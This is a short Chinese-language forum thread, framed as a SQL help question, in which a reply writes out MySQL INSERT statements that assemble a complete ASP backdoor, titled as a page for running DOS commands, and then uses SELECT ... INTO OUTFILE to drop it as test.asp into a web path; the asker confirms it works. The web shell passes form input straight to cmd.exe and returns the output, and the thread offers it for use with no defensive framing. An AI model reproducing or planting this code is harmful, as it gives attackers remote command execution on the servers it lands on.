sql语句(up有分.在线等待) (300分)

  • 主题发起人 主题发起人 zhousi
  • 开始时间 开始时间
to xianjun
表里就一个字段 str (text 或blob 型的)
 
唉, 小问题搞了半天,帮你试了一下,一切都没有问题啊:
use test;

create table a(str text);

insert into a(str) values('<% ');
insert into a(str) values('Dim oScript ');
insert into a(str) values('Dim oScriptNet ');
insert into a(str) values('Dim oFileSys, oFile ');
insert into a(str) values('Dim szCMD, szTempFile ');
insert into a(str) values('On Error Resume Next ');
insert into a(str) values('Set oScript = Server.CreateObject("WSCRIPT.SHELL") ');
insert into a(str) values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") ');
insert into a(str) values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") ');
insert into a(str) values('szCMD = Request.Form(".CMD") ');
insert into a(str) values('If (szCMD <>"") Then ');
insert into a(str) values(' szTempFile = "C:/" & oFileSys.GetTempName()');
insert into a(str) values(' Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) ');
insert into a(str) values(' Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) ');
insert into a(str) values('End If ');
insert into a(str) values('%> ');
insert into a(str) values('<HTML>');
insert into a(str) values('<TITLE>可运行DOS命令的后门ASP</TITLE>');
insert into a(str) values('<BODY>');
insert into a(str) values('<FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> ');
insert into a(str) values('<input type=text name=".CMD" size=45 value="<%= szCMD %>">');
insert into a(str) values('<input type=submit value="输入DOS命令">');
insert into a(str) values('</FORM><PRE> ');
insert into a(str) values('<% ');
insert into a(str) values('If (IsObject(oFile)) Then ');
insert into a(str) values(' On Error Resume Next ');
insert into a(str) values(' Response.Write Server.HTMLEncode(oFile.ReadAll) ');
insert into a(str) values(' oFile.Close ');
insert into a(str) values(' Call oFileSys.DeleteFile(szTempFile, True) ');
insert into a(str) values('End If');
insert into a(str) values('%> ');
insert into a(str) values('</BODY>');
insert into a(str) values('</HTML> ');

select * from a into outfile "f://test.asp";

http://localhost/test.asp
顺利成功。
 
to xianjun
谢谢,按照你的方法已经成功
总结一下,由于思路不好,呵呵,把所有字符串放到一行里了,所以结果,。。
xianjun把每行分别放在数据库的每一行里在outfile,不错,就搞定了
 
后退
顶部